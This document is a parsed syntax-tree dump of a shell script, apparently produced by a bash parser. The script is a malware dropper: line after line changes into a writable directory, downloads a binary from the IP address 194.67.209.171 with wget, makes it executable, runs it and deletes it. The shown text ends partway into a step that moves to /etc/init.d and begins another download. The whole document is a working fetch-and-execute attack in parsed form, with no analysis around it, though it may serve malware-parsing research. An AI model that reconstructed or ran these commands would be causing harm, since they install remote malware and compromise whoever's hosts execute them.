ListNode(lineno=2, pos=(12, 150), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 102), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 102), word='http://194.67.209.171/lungkass'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(102, 103)),
  CommandNode(lineno=2, pos=(104, 121), parts=[
    WordNode(lineno=2, pos=(104, 109), word='chmod'),
    WordNode(lineno=2, pos=(110, 112), word='+x'),
    WordNode(lineno=2, pos=(113, 121), word='lungkass'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(121, 122)),
  CommandNode(lineno=2, pos=(123, 133), parts=[
    WordNode(lineno=2, pos=(123, 133), word='./lungkass'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(133, 134)),
  CommandNode(lineno=2, pos=(135, 150), parts=[
    WordNode(lineno=2, pos=(135, 137), word='rm'),
    WordNode(lineno=2, pos=(138, 141), word='-rf'),
    WordNode(lineno=2, pos=(142, 150), word='lungkass'),
  ]),
])
ListNode(lineno=3, pos=(151, 285), parts=[
  CommandNode(lineno=3, pos=(151, 158), parts=[
    WordNode(lineno=3, pos=(151, 153), word='cd'),
    WordNode(lineno=3, pos=(154, 158), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(159, 161)),
  CommandNode(lineno=3, pos=(162, 173), parts=[
    WordNode(lineno=3, pos=(162, 164), word='cd'),
    WordNode(lineno=3, pos=(165, 173), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(174, 176)),
  CommandNode(lineno=3, pos=(177, 184), parts=[
    WordNode(lineno=3, pos=(177, 179), word='cd'),
    WordNode(lineno=3, pos=(180, 184), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(185, 187)),
  CommandNode(lineno=3, pos=(188, 196), parts=[
    WordNode(lineno=3, pos=(188, 190), word='cd'),
    WordNode(lineno=3, pos=(191, 196), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(197, 199)),
  CommandNode(lineno=3, pos=(200, 204), parts=[
    WordNode(lineno=3, pos=(200, 202), word='cd'),
    WordNode(lineno=3, pos=(203, 204), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(204, 205)),
  CommandNode(lineno=3, pos=(206, 240), parts=[
    WordNode(lineno=3, pos=(206, 210), word='wget'),
    WordNode(lineno=3, pos=(211, 240), word='http://194.67.209.171/mangoss'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(240, 241)),
  CommandNode(lineno=3, pos=(242, 258), parts=[
    WordNode(lineno=3, pos=(242, 247), word='chmod'),
    WordNode(lineno=3, pos=(248, 250), word='+x'),
    WordNode(lineno=3, pos=(251, 258), word='mangoss'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(258, 259)),
  CommandNode(lineno=3, pos=(260, 269), parts=[
    WordNode(lineno=3, pos=(260, 269), word='./mangoss'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(269, 270)),
  CommandNode(lineno=3, pos=(271, 285), parts=[
    WordNode(lineno=3, pos=(271, 273), word='rm'),
    WordNode(lineno=3, pos=(274, 277), word='-rf'),
    WordNode(lineno=3, pos=(278, 285), word='mangoss'),
  ]),
])
ListNode(lineno=4, pos=(286, 424), parts=[
  CommandNode(lineno=4, pos=(286, 293), parts=[
    WordNode(lineno=4, pos=(286, 288), word='cd'),
    WordNode(lineno=4, pos=(289, 293), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(294, 296)),
  CommandNode(lineno=4, pos=(297, 308), parts=[
    WordNode(lineno=4, pos=(297, 299), word='cd'),
    WordNode(lineno=4, pos=(300, 308), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(309, 311)),
  CommandNode(lineno=4, pos=(312, 319), parts=[
    WordNode(lineno=4, pos=(312, 314), word='cd'),
    WordNode(lineno=4, pos=(315, 319), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(320, 322)),
  CommandNode(lineno=4, pos=(323, 331), parts=[
    WordNode(lineno=4, pos=(323, 325), word='cd'),
    WordNode(lineno=4, pos=(326, 331), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(332, 334)),
  CommandNode(lineno=4, pos=(335, 339), parts=[
    WordNode(lineno=4, pos=(335, 337), word='cd'),
    WordNode(lineno=4, pos=(338, 339), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(339, 340)),
  CommandNode(lineno=4, pos=(341, 376), parts=[
    WordNode(lineno=4, pos=(341, 345), word='wget'),
    WordNode(lineno=4, pos=(346, 376), word='http://194.67.209.171/openggls'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(376, 377)),
  CommandNode(lineno=4, pos=(378, 395), parts=[
    WordNode(lineno=4, pos=(378, 383), word='chmod'),
    WordNode(lineno=4, pos=(384, 386), word='+x'),
    WordNode(lineno=4, pos=(387, 395), word='openggls'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(395, 396)),
  CommandNode(lineno=4, pos=(397, 407), parts=[
    WordNode(lineno=4, pos=(397, 407), word='./openggls'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(407, 408)),
  CommandNode(lineno=4, pos=(409, 424), parts=[
    WordNode(lineno=4, pos=(409, 411), word='rm'),
    WordNode(lineno=4, pos=(412, 415), word='-rf'),
    WordNode(lineno=4, pos=(416, 424), word='openggls'),
  ]),
])
ListNode(lineno=5, pos=(425, 551), parts=[
  CommandNode(lineno=5, pos=(425, 432), parts=[
    WordNode(lineno=5, pos=(425, 427), word='cd'),
    WordNode(lineno=5, pos=(428, 432), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(433, 435)),
  CommandNode(lineno=5, pos=(436, 447), parts=[
    WordNode(lineno=5, pos=(436, 438), word='cd'),
    WordNode(lineno=5, pos=(439, 447), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(448, 450)),
  CommandNode(lineno=5, pos=(451, 458), parts=[
    WordNode(lineno=5, pos=(451, 453), word='cd'),
    WordNode(lineno=5, pos=(454, 458), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(459, 461)),
  CommandNode(lineno=5, pos=(462, 470), parts=[
    WordNode(lineno=5, pos=(462, 464), word='cd'),
    WordNode(lineno=5, pos=(465, 470), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(471, 473)),
  CommandNode(lineno=5, pos=(474, 478), parts=[
    WordNode(lineno=5, pos=(474, 476), word='cd'),
    WordNode(lineno=5, pos=(477, 478), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(478, 479)),
  CommandNode(lineno=5, pos=(480, 512), parts=[
    WordNode(lineno=5, pos=(480, 484), word='wget'),
    WordNode(lineno=5, pos=(485, 512), word='http://194.67.209.171/vasts'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(512, 513)),
  CommandNode(lineno=5, pos=(514, 528), parts=[
    WordNode(lineno=5, pos=(514, 519), word='chmod'),
    WordNode(lineno=5, pos=(520, 522), word='+x'),
    WordNode(lineno=5, pos=(523, 528), word='vasts'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(528, 529)),
  CommandNode(lineno=5, pos=(530, 537), parts=[
    WordNode(lineno=5, pos=(530, 537), word='./vasts'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(537, 538)),
  CommandNode(lineno=5, pos=(539, 551), parts=[
    WordNode(lineno=5, pos=(539, 541), word='rm'),
    WordNode(lineno=5, pos=(542, 545), word='-rf'),
    WordNode(lineno=5, pos=(546, 551), word='vasts'),
  ]),
])
ListNode(lineno=6, pos=(552, 690), parts=[
  CommandNode(lineno=6, pos=(552, 559), parts=[
    WordNode(lineno=6, pos=(552, 554), word='cd'),
    WordNode(lineno=6, pos=(555, 559), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(560, 562)),
  CommandNode(lineno=6, pos=(563, 574), parts=[
    WordNode(lineno=6, pos=(563, 565), word='cd'),
    WordNode(lineno=6, pos=(566, 574), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(575, 577)),
  CommandNode(lineno=6, pos=(578, 585), parts=[
    WordNode(lineno=6, pos=(578, 580), word='cd'),
    WordNode(lineno=6, pos=(581, 585), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(586, 588)),
  CommandNode(lineno=6, pos=(589, 597), parts=[
    WordNode(lineno=6, pos=(589, 591), word='cd'),
    WordNode(lineno=6, pos=(592, 597), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(598, 600)),
  CommandNode(lineno=6, pos=(601, 605), parts=[
    WordNode(lineno=6, pos=(601, 603), word='cd'),
    WordNode(lineno=6, pos=(604, 605), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(605, 606)),
  CommandNode(lineno=6, pos=(607, 642), parts=[
    WordNode(lineno=6, pos=(607, 611), word='wget'),
    WordNode(lineno=6, pos=(612, 642), word='http://194.67.209.171/greypsss'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(642, 643)),
  CommandNode(lineno=6, pos=(644, 661), parts=[
    WordNode(lineno=6, pos=(644, 649), word='chmod'),
    WordNode(lineno=6, pos=(650, 652), word='+x'),
    WordNode(lineno=6, pos=(653, 661), word='greypsss'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(661, 662)),
  CommandNode(lineno=6, pos=(663, 673), parts=[
    WordNode(lineno=6, pos=(663, 673), word='./greypsss'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(673, 674)),
  CommandNode(lineno=6, pos=(675, 690), parts=[
    WordNode(lineno=6, pos=(675, 677), word='rm'),
    WordNode(lineno=6, pos=(678, 681), word='-rf'),
    WordNode(lineno=6, pos=(682, 690), word='greypsss'),
  ]),
])
ListNode(lineno=7, pos=(691, 825), parts=[
  CommandNode(lineno=7, pos=(691, 698), parts=[
    WordNode(lineno=7, pos=(691, 693), word='cd'),
    WordNode(lineno=7, pos=(694, 698), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(699, 701)),
  CommandNode(lineno=7, pos=(702, 713), parts=[
    WordNode(lineno=7, pos=(702, 704), word='cd'),
    WordNode(lineno=7, pos=(705, 713), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(714, 716)),
  CommandNode(lineno=7, pos=(717, 724), parts=[
    WordNode(lineno=7, pos=(717, 719), word='cd'),
    WordNode(lineno=7, pos=(720, 724), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(725, 727)),
  CommandNode(lineno=7, pos=(728, 736), parts=[
    WordNode(lineno=7, pos=(728, 730), word='cd'),
    WordNode(lineno=7, pos=(731, 736), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(737, 739)),
  CommandNode(lineno=7, pos=(740, 744), parts=[
    WordNode(lineno=7, pos=(740, 742), word='cd'),
    WordNode(lineno=7, pos=(743, 744), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(744, 745)),
  CommandNode(lineno=7, pos=(746, 780), parts=[
    WordNode(lineno=7, pos=(746, 750), word='wget'),
    WordNode(lineno=7, pos=(751, 780), word='http://194.67.209.171/kuhamos'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(780, 781)),
  CommandNode(lineno=7, pos=(782, 798), parts=[
    WordNode(lineno=7, pos=(782, 787), word='chmod'),
    WordNode(lineno=7, pos=(788, 790), word='+x'),
    WordNode(lineno=7, pos=(791, 798), word='kuhamos'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(798, 799)),
  CommandNode(lineno=7, pos=(800, 809), parts=[
    WordNode(lineno=7, pos=(800, 809), word='./kuhamos'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(809, 810)),
  CommandNode(lineno=7, pos=(811, 825), parts=[
    WordNode(lineno=7, pos=(811, 813), word='rm'),
    WordNode(lineno=7, pos=(814, 817), word='-rf'),
    WordNode(lineno=7, pos=(818, 825), word='kuhamos'),
  ]),
])
ListNode(lineno=8, pos=(826, 960), parts=[
  CommandNode(lineno=8, pos=(826, 833), parts=[
    WordNode(lineno=8, pos=(826, 828), word='cd'),
    WordNode(lineno=8, pos=(829, 833), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(834, 836)),
  CommandNode(lineno=8, pos=(837, 848), parts=[
    WordNode(lineno=8, pos=(837, 839), word='cd'),
    WordNode(lineno=8, pos=(840, 848), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(849, 851)),
  CommandNode(lineno=8, pos=(852, 859), parts=[
    WordNode(lineno=8, pos=(852, 854), word='cd'),
    WordNode(lineno=8, pos=(855, 859), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(860, 862)),
  CommandNode(lineno=8, pos=(863, 871), parts=[
    WordNode(lineno=8, pos=(863, 865), word='cd'),
    WordNode(lineno=8, pos=(866, 871), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(872, 874)),
  CommandNode(lineno=8, pos=(875, 879), parts=[
    WordNode(lineno=8, pos=(875, 877), word='cd'),
    WordNode(lineno=8, pos=(878, 879), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(879, 880)),
  CommandNode(lineno=8, pos=(881, 915), parts=[
    WordNode(lineno=8, pos=(881, 885), word='wget'),
    WordNode(lineno=8, pos=(886, 915), word='http://194.67.209.171/marcoss'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(915, 916)),
  CommandNode(lineno=8, pos=(917, 933), parts=[
    WordNode(lineno=8, pos=(917, 922), word='chmod'),
    WordNode(lineno=8, pos=(923, 925), word='+x'),
    WordNode(lineno=8, pos=(926, 933), word='marcoss'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(933, 934)),
  CommandNode(lineno=8, pos=(935, 944), parts=[
    WordNode(lineno=8, pos=(935, 944), word='./marcoss'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(944, 945)),
  CommandNode(lineno=8, pos=(946, 960), parts=[
    WordNode(lineno=8, pos=(946, 948), word='rm'),
    WordNode(lineno=8, pos=(949, 952), word='-rf'),
    WordNode(lineno=8, pos=(953, 960), word='marcoss'),
  ]),
])
ListNode(lineno=9, pos=(961, 1099), parts=[
  CommandNode(lineno=9, pos=(961, 968), parts=[
    WordNode(lineno=9, pos=(961, 963), word='cd'),
    WordNode(lineno=9, pos=(964, 968), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(969, 971)),
  CommandNode(lineno=9, pos=(972, 983), parts=[
    WordNode(lineno=9, pos=(972, 974), word='cd'),
    WordNode(lineno=9, pos=(975, 983), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(984, 986)),
  CommandNode(lineno=9, pos=(987, 994), parts=[
    WordNode(lineno=9, pos=(987, 989), word='cd'),
    WordNode(lineno=9, pos=(990, 994), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(995, 997)),
  CommandNode(lineno=9, pos=(998, 1006), parts=[
    WordNode(lineno=9, pos=(998, 1000), word='cd'),
    WordNode(lineno=9, pos=(1001, 1006), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1007, 1009)),
  CommandNode(lineno=9, pos=(1010, 1014), parts=[
    WordNode(lineno=9, pos=(1010, 1012), word='cd'),
    WordNode(lineno=9, pos=(1013, 1014), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1014, 1015)),
  CommandNode(lineno=9, pos=(1016, 1051), parts=[
    WordNode(lineno=9, pos=(1016, 1020), word='wget'),
    WordNode(lineno=9, pos=(1021, 1051), word='http://194.67.209.171/chikosss'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1051, 1052)),
  CommandNode(lineno=9, pos=(1053, 1070), parts=[
    WordNode(lineno=9, pos=(1053, 1058), word='chmod'),
    WordNode(lineno=9, pos=(1059, 1061), word='+x'),
    WordNode(lineno=9, pos=(1062, 1070), word='chikosss'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1070, 1071)),
  CommandNode(lineno=9, pos=(1072, 1082), parts=[
    WordNode(lineno=9, pos=(1072, 1082), word='./chikosss'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1082, 1083)),
  CommandNode(lineno=9, pos=(1084, 1099), parts=[
    WordNode(lineno=9, pos=(1084, 1086), word='rm'),
    WordNode(lineno=9, pos=(1087, 1090), word='-rf'),
    WordNode(lineno=9, pos=(1091, 1099), word='chikosss'),
  ]),
])
ListNode(lineno=10, pos=(1100, 1238), parts=[
  CommandNode(lineno=10, pos=(1100, 1107), parts=[
    WordNode(lineno=10, pos=(1100, 1102), word='cd'),
    WordNode(lineno=10, pos=(1103, 1107), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1108, 1110)),
  CommandNode(lineno=10, pos=(1111, 1122), parts=[
    WordNode(lineno=10, pos=(1111, 1113), word='cd'),
    WordNode(lineno=10, pos=(1114, 1122), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1123, 1125)),
  CommandNode(lineno=10, pos=(1126, 1133), parts=[
    WordNode(lineno=10, pos=(1126, 1128), word='cd'),
    WordNode(lineno=10, pos=(1129, 1133), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1134, 1136)),
  CommandNode(lineno=10, pos=(1137, 1145), parts=[
    WordNode(lineno=10, pos=(1137, 1139), word='cd'),
    WordNode(lineno=10, pos=(1140, 1145), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1146, 1148)),
  CommandNode(lineno=10, pos=(1149, 1153), parts=[
    WordNode(lineno=10, pos=(1149, 1151), word='cd'),
    WordNode(lineno=10, pos=(1152, 1153), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1153, 1154)),
  CommandNode(lineno=10, pos=(1155, 1190), parts=[
    WordNode(lineno=10, pos=(1155, 1159), word='wget'),
    WordNode(lineno=10, pos=(1160, 1190), word='http://194.67.209.171/pchikoss'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1190, 1191)),
  CommandNode(lineno=10, pos=(1192, 1209), parts=[
    WordNode(lineno=10, pos=(1192, 1197), word='chmod'),
    WordNode(lineno=10, pos=(1198, 1200), word='+x'),
    WordNode(lineno=10, pos=(1201, 1209), word='pchikoss'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1209, 1210)),
  CommandNode(lineno=10, pos=(1211, 1221), parts=[
    WordNode(lineno=10, pos=(1211, 1221), word='./pchikoss'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1221, 1222)),
  CommandNode(lineno=10, pos=(1223, 1238), parts=[
    WordNode(lineno=10, pos=(1223, 1225), word='rm'),
    WordNode(lineno=10, pos=(1226, 1229), word='-rf'),
    WordNode(lineno=10, pos=(1230, 1238), word='pchikoss'),
  ]),
])
ListNode(lineno=11, pos=(1239, 1353), parts=[
  CommandNode(lineno=11, pos=(1239, 1246), parts=[
    WordNode(lineno=11, pos=(1239, 1241), word='cd'),
    WordNode(lineno=11, pos=(1242, 1246), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1247, 1249)),
  CommandNode(lineno=11, pos=(1250, 1261), parts=[
    WordNode(lineno=11, pos=(1250, 1252), word='cd'),
    WordNode(lineno=11, pos=(1253, 1261), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1262, 1264)),
  CommandNode(lineno=11, pos=(1265, 1272), parts=[
    WordNode(lineno=11, pos=(1265, 1267), word='cd'),
    WordNode(lineno=11, pos=(1268, 1272), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1273, 1275)),
  CommandNode(lineno=11, pos=(1276, 1284), parts=[
    WordNode(lineno=11, pos=(1276, 1278), word='cd'),
    WordNode(lineno=11, pos=(1279, 1284), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1285, 1287)),
  CommandNode(lineno=11, pos=(1288, 1292), parts=[
    WordNode(lineno=11, pos=(1288, 1290), word='cd'),
    WordNode(lineno=11, pos=(1291, 1292), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1292, 1293)),
  CommandNode(lineno=11, pos=(1294, 1323), parts=[
    WordNode(lineno=11, pos=(1294, 1298), word='wget'),
    WordNode(lineno=11, pos=(1299, 1323), word='http://194.67.209.171/sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1323, 1324)),
  CommandNode(lineno=11, pos=(1325, 1336), parts=[
    WordNode(lineno=11, pos=(1325, 1330), word='chmod'),
    WordNode(lineno=11, pos=(1331, 1333), word='+x'),
    WordNode(lineno=11, pos=(1334, 1336), word='sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1336, 1337)),
  CommandNode(lineno=11, pos=(1338, 1342), parts=[
    WordNode(lineno=11, pos=(1338, 1342), word='./sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1342, 1343)),
  CommandNode(lineno=11, pos=(1344, 1353), parts=[
    WordNode(lineno=11, pos=(1344, 1346), word='rm'),
    WordNode(lineno=11, pos=(1347, 1350), word='-rf'),
    WordNode(lineno=11, pos=(1351, 1353), word='sh'),
  ]),
])
ListNode(lineno=12, pos=(1354, 1472), parts=[
  CommandNode(lineno=12, pos=(1354, 1361), parts=[
    WordNode(lineno=12, pos=(1354, 1356), word='cd'),
    WordNode(lineno=12, pos=(1357, 1361), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1362, 1364)),
  CommandNode(lineno=12, pos=(1365, 1376), parts=[
    WordNode(lineno=12, pos=(1365, 1367), word='cd'),
    WordNode(lineno=12, pos=(1368, 1376), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1377, 1379)),
  CommandNode(lineno=12, pos=(1380, 1387), parts=[
    WordNode(lineno=12, pos=(1380, 1382), word='cd'),
    WordNode(lineno=12, pos=(1383, 1387), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1388, 1390)),
  CommandNode(lineno=12, pos=(1391, 1399), parts=[
    WordNode(lineno=12, pos=(1391, 1393), word='cd'),
    WordNode(lineno=12, pos=(1394, 1399), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1400, 1402)),
  CommandNode(lineno=12, pos=(1403, 1407), parts=[
    WordNode(lineno=12, pos=(1403, 1405), word='cd'),
    WordNode(lineno=12, pos=(1406, 1407), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1407, 1408)),
  CommandNode(lineno=12, pos=(1409, 1439), parts=[
    WordNode(lineno=12, pos=(1409, 1413), word='wget'),
    WordNode(lineno=12, pos=(1414, 1439), word='http://194.67.209.171/ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1439, 1440)),
  CommandNode(lineno=12, pos=(1441, 1453), parts=[
    WordNode(lineno=12, pos=(1441, 1446), word='chmod'),
    WordNode(lineno=12, pos=(1447, 1449), word='+x'),
    WordNode(lineno=12, pos=(1450, 1453), word=' '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1453, 1454)),
  CommandNode(lineno=12, pos=(1455, 1460), parts=[
    WordNode(lineno=12, pos=(1455, 1460), word='./ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1460, 1461)),
  CommandNode(lineno=12, pos=(1462, 1472), parts=[
    WordNode(lineno=12, pos=(1462, 1464), word='rm'),
    WordNode(lineno=12, pos=(1465, 1468), word='-rf'),
    WordNode(lineno=12, pos=(1469, 1472), word=' '),
  ]),
])
ListNode(lineno=13, pos=(1473, 1615), parts=[
  CommandNode(lineno=13, pos=(1473, 1480), parts=[
    WordNode(lineno=13, pos=(1473, 1475), word='cd'),
    WordNode(lineno=13, pos=(1476, 1480), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1481, 1483)),
  CommandNode(lineno=13, pos=(1484, 1495), parts=[
    WordNode(lineno=13, pos=(1484, 1486), word='cd'),
    WordNode(lineno=13, pos=(1487, 1495), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1496, 1498)),
  CommandNode(lineno=13, pos=(1499, 1506), parts=[
    WordNode(lineno=13, pos=(1499, 1501), word='cd'),
    WordNode(lineno=13, pos=(1502, 1506), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1507, 1509)),
  CommandNode(lineno=13, pos=(1510, 1518), parts=[
    WordNode(lineno=13, pos=(1510, 1512), word='cd'),
    WordNode(lineno=13, pos=(1513, 1518), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1519, 1521)),
  CommandNode(lineno=13, pos=(1522, 1526), parts=[
    WordNode(lineno=13, pos=(1522, 1524), word='cd'),
    WordNode(lineno=13, pos=(1525, 1526), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1526, 1527)),
  CommandNode(lineno=13, pos=(1528, 1564), parts=[
    WordNode(lineno=13, pos=(1528, 1532), word='wget'),
    WordNode(lineno=13, pos=(1533, 1564), word='http://194.67.209.171/facebook3'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1564, 1565)),
  CommandNode(lineno=13, pos=(1566, 1584), parts=[
    WordNode(lineno=13, pos=(1566, 1571), word='chmod'),
    WordNode(lineno=13, pos=(1572, 1574), word='+x'),
    WordNode(lineno=13, pos=(1575, 1584), word='facebook3'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1584, 1585)),
  CommandNode(lineno=13, pos=(1586, 1597), parts=[
    WordNode(lineno=13, pos=(1586, 1597), word='./facebook3'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1597, 1598)),
  CommandNode(lineno=13, pos=(1599, 1615), parts=[
    WordNode(lineno=13, pos=(1599, 1601), word='rm'),
    WordNode(lineno=13, pos=(1602, 1605), word='-rf'),
    WordNode(lineno=13, pos=(1606, 1615), word='facebook3'),
  ]),
])
ListNode(lineno=14, pos=(1616, 1754), parts=[
  CommandNode(lineno=14, pos=(1616, 1623), parts=[
    WordNode(lineno=14, pos=(1616, 1618), word='cd'),
    WordNode(lineno=14, pos=(1619, 1623), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1624, 1626)),
  CommandNode(lineno=14, pos=(1627, 1638), parts=[
    WordNode(lineno=14, pos=(1627, 1629), word='cd'),
    WordNode(lineno=14, pos=(1630, 1638), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1639, 1641)),
  CommandNode(lineno=14, pos=(1642, 1649), parts=[
    WordNode(lineno=14, pos=(1642, 1644), word='cd'),
    WordNode(lineno=14, pos=(1645, 1649), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1650, 1652)),
  CommandNode(lineno=14, pos=(1653, 1661), parts=[
    WordNode(lineno=14, pos=(1653, 1655), word='cd'),
    WordNode(lineno=14, pos=(1656, 1661), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1662, 1664)),
  CommandNode(lineno=14, pos=(1665, 1669), parts=[
    WordNode(lineno=14, pos=(1665, 1667), word='cd'),
    WordNode(lineno=14, pos=(1668, 1669), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1669, 1670)),
  CommandNode(lineno=14, pos=(1671, 1706), parts=[
    WordNode(lineno=14, pos=(1671, 1675), word='wget'),
    WordNode(lineno=14, pos=(1676, 1706), word='http://194.67.209.171/netdelds'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1706, 1707)),
  CommandNode(lineno=14, pos=(1708, 1725), parts=[
    WordNode(lineno=14, pos=(1708, 1713), word='chmod'),
    WordNode(lineno=14, pos=(1714, 1716), word='+x'),
    WordNode(lineno=14, pos=(1717, 1725), word='netdelds'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1725, 1726)),
  CommandNode(lineno=14, pos=(1727, 1737), parts=[
    WordNode(lineno=14, pos=(1727, 1737), word='./netdelds'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1737, 1738)),
  CommandNode(lineno=14, pos=(1739, 1754), parts=[
    WordNode(lineno=14, pos=(1739, 1741), word='rm'),
    WordNode(lineno=14, pos=(1742, 1745), word='-rf'),
    WordNode(lineno=14, pos=(1746, 1754), word='netdelds'),
  ]),
])
ListNode(lineno=15, pos=(1755, 1855), parts=[
  CommandNode(lineno=15, pos=(1755, 1769), parts=[
    WordNode(lineno=15, pos=(1755, 1757), word='cd'),
    WordNode(lineno=15, pos=(1758, 1769), word='/etc/init.d'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1769, 1770)),
  CommandNode(lineno=15, pos=(1771, 1804), parts=[
    WordNode(lineno=15, pos=(1771, 1775), word='wget'),
